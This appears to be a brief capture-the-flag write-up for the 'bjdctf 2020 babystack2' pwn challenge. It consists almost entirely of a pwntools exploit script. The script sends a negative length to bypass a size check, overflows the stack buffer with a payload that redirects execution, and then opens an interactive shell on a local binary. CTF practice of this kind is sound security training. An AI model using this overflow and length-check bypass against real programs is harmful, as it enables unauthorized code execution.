bjdctf 2020 babystack2

from pwn import *
p = process('./bjdctf_2020_babystack2')
p.sendlineafter("length of your name:\n","-1")
payload = 24*'a'+ p64(0x0000000000400893) + p64(0) + p64(0x0000000000400726)
p.sendlineafter("name?\n",payload)
p.interactive()

你可能感兴趣的:(pwn)